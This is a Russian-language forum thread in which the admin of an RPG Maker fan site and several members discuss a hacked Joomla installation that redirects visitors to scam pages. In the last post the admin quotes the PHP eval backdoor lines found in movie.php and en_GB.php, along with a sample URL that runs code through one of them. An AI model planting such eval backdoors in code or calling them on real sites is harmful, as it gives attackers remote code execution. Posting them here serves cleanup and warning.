forum
Добро пожаловать, Гость
Логин: Пароль: Запомнить меня
  • Страница:
  • 1
  • 2

ТЕМА: "Предупреждение: у этого сайта плохая репутация"

"Предупреждение: у этого сайта плохая репутация" 15.03.2013 10:48 #3358

  • Samael
  • Samael аватар
  • Вне сайта
  • Друг форума
  • Сообщений: 507
  • Спасибо получено: 305
  • Репутация: 150
Rivelin пишет:
Samael пишет:
Правда увы подмену ссылок не вижу, т.к. пользуюсь firefox'om да и ещё с плагинами noscript(разрешен весь сайт сейчас, ни чего не заблокировано) и adblock Plus
Что значит, увы?! Радоваться надо, что не перенаправляет на всякие сомнительные сайты. :)
У меня только Adblock Plus, и подмена ссылок "радует" своей неопределенностью, то на один сайт выкинут, то на другой.
Яндекс уже пришпилил к Локатору уведомление "сайт может угрожать безопасности вашего компьютера и т.д. и т.п."... быстренько они. :dry:
Увы наверно по той причине, что мне показывают предупреждение, но при этом я да же и не увижу что не так на сайте, т.к. у меня всё подозрительное блокируется автоматом...
Да и у меня в фоксе запрещено авто пере направление, т.е. пока я не скажу можно перейти, фокс сам не перейдёт куда либо автоматом. Но в данном случае да же не высвечивается что перенаправляют.
Кстати если важно - версия фокса 14.0.1, но многие системы его видят как 5-ю версию... похоже профиль с той версии имеет и свои "плюсы"(для меня лично это забавно) :)
Нравится аниме, visual novel и jRPG/TRPG/TBS.
Последнее редактирование: 15.03.2013 13:11 от Samael.
Администратор запретил публиковать записи.

"Предупреждение: у этого сайта плохая репутация" 15.03.2013 15:22 #3361

  • AnnTenna
  • AnnTenna аватар
  • Вне сайта
  • Администратор
  • ловлю волны настроения
  • Сообщений: 4119
  • Спасибо получено: 1368
  • Репутация: 317
Спасибо за информацию! Сразу же взялась править, бросив все дела и планы - сейчас, вроде, перенаправлять не должно. Но яндекс и опера снова будут некоторое время ругаться :(

Вирус, похоже, тот же самый. Я пыталась заходить с яндекса, меня вобще перенаправляло куда-то, где предлагали номер телефона ввести - вот уж подлые и вонюяие твари эти мошенники, прицепились к сайту, упыри! :unsure:

Эххх...да что ж такое >_< И из этого напрашивается вывод, что уязвимость еще не найдена :( и то, что произошло два раза, может повториться и в третий....как же тяжко :pinch: Знать бы, как это не допустить :unsure:
Администратор запретил публиковать записи.

"Предупреждение: у этого сайта плохая репутация" 15.03.2013 22:09 #3368

  • Lekste
  • Lekste аватар
  • Вне сайта
  • Разработчик
  • Мяяяяяяяяяяяяя!
  • Сообщений: 415
  • Спасибо получено: 127
  • Репутация: 82
Может вы не все файлы удалили? Может там еще скрытые остались, которые при запуске создают новые копии.
Не воспринимай воздействие с негативной стороны, и жизнь станет проще... :)
Администратор запретил публиковать записи.

"Предупреждение: у этого сайта плохая репутация" 15.03.2013 22:18 #3369

  • AnnTenna
  • AnnTenna аватар
  • Вне сайта
  • Администратор
  • ловлю волны настроения
  • Сообщений: 4119
  • Спасибо получено: 1368
  • Репутация: 317
Ой, не знаю :blush: :whistle: :pinch: А как это проверить?

Вообще о том, что этот вирус может повторяться, давал ссылку Скай...ну как устранить причину я так и не поняла...но сейчас, вроде, нормально заходится по внешним ссылкам :S но неизвестно, когда ждать следующей атаки :unsure:

PS я сегодня уже удаляла какие то левые файлы...но не уверена, все ли это ...
Последнее редактирование: 15.03.2013 22:20 от AnnTenna.
Администратор запретил публиковать записи.

"Предупреждение: у этого сайта плохая репутация" 15.03.2013 23:35 #3372

  • Samael
  • Samael аватар
  • Вне сайта
  • Друг форума
  • Сообщений: 507
  • Спасибо получено: 305
  • Репутация: 150
На ссылку которую давал skyblade в коментариях 6-го числа ругается мой антивирус - это нормально?
А как это проверить?
Может другим антивирусом, 100% вирусов ни один антивирус не находит, да же касперский.

Правда если про скрытые, тогда наверно надо Сделать видимыми невидимые и системные файлы, если правда система работы с FTP/сайтом такая же как и с виндой...
Увы в подобном я ноль, только знаю что примерно надо делать если вирус на компе и как примерно с ним бороться.
Нравится аниме, visual novel и jRPG/TRPG/TBS.
Последнее редактирование: 16.03.2013 01:44 от Samael.
Администратор запретил публиковать записи.

"Предупреждение: у этого сайта плохая репутация" 16.03.2013 20:22 #3383

  • AnnTenna
  • AnnTenna аватар
  • Вне сайта
  • Администратор
  • ловлю волны настроения
  • Сообщений: 4119
  • Спасибо получено: 1368
  • Репутация: 317
На ссылку которую давал skyblade в коментариях 6-го числа ругается мой антивирус - это нормально?
хмм..это настораживает. Вообще я доверяю Скаю, и не думаю, что он стал бы давать такую ссылку с вирусом, хотя, с тем сайтом и могут быть проблемы...но у меня не ругается :huh:
Может другим антивирусом, 100% вирусов ни один антивирус не находит, да же касперский
Проверяла Нодом, а потом Мальварой...даж не знаю :S

Как на винде найти скрытые файлы я тоже представляю, но вот в ФТП... :huh: разве что пошарить в резервной копии...
Администратор запретил публиковать записи.

"Предупреждение: у этого сайта плохая репутация" 18.03.2013 01:24 #3390

  • AnnTenna
  • AnnTenna аватар
  • Вне сайта
  • Администратор
  • ловлю волны настроения
  • Сообщений: 4119
  • Спасибо получено: 1368
  • Репутация: 317
Спасибо! :blush: Я, кажется, нашла $_POST еще в нескольких файлах, сейчас уже поздняя ночь, доделался бекап (ох как же он долго делается), в общем, завтра значит будем удалять эти посты и евалы еще раз, и действительно если что не получится, то могу даже дать доступ в фтп, потому что это дело очень важное и сайт надо спасать :unsure: , а ты, по ходу, действительно в этом понимаешь намного больше, чем я -некоторые вещи, что писал, я вообще не поняла - в частности, как сделать запрет на выполнение кода и как проверить Айболитом. Насчет крайнего случая, надеюсь, что все таки дело не дойдет, там очень много править, и вручную искать разницу с исходной джумлой тоже крайне тяжко :( доступ к логам не нашла, и дату посмотреть тоже не могу, потому что уже недавно эти файлы восстанавливала и перезаписывала из бекапа, когда лечила, и еще не думала, что повторно всплывет эта зараза.

Что касается портирования, лучше отдельной темой это обсудить, я думаю, что почему бы и нет, действительно ^__^ Правда если портировать Фентези Стар, то лучше обсудить с главным автором, а у меня как раз подозрение, что эта игра больше всего может подойти для этих целей :) если что, все необходимые материалы готова выдать, может, что-то и выйдет классное :)
Последнее редактирование: 18.03.2013 01:26 от AnnTenna.
Администратор запретил публиковать записи.

"Предупреждение: у этого сайта плохая репутация" 19.03.2013 18:11 #3399

  • AnnTenna
  • AnnTenna аватар
  • Вне сайта
  • Администратор
  • ловлю волны настроения
  • Сообщений: 4119
  • Спасибо получено: 1368
  • Репутация: 317
Нам вроде, удалось найти источник этой заразы, и если что, теперь все под контролем. Вчера сайт был недоступен по этой технической причине.

Нашли еще
./components/com_media/movie.php:eval(base64_decode($_POST["dir"]));
./images/banners/movie.php:eval(base64_decode($_POST["dir"]));

Файл movie.php как раз этот скрипт распространял.
Файл /language/en-GB/en_GB.php
if (isset($_REQUEST)) eval(stripslashes($_REQUEST));

$_REQUEST - это глобальный массив, туда входит и $_POST и $_GET, тоесть здесь еще веселее - код исполнится даже через get, тоесть прямо в окне браузера пишем:
сайт/language/en-GB/en_GB.php?en=phpinfo();

И еще эту бяку нашли. И в логе - шелл.

Огромное спасибо alphabravo за помощь!
Администратор запретил публиковать записи.
  • Страница:
  • 1
  • 2
Время создания страницы: 0.209 секунд
сайт другаСветлая зона и Академия РПГ Мейкераkn4kn5Плагины для RPG MakerДневник одной нэкоknНовая Реальность Топ Разработка игр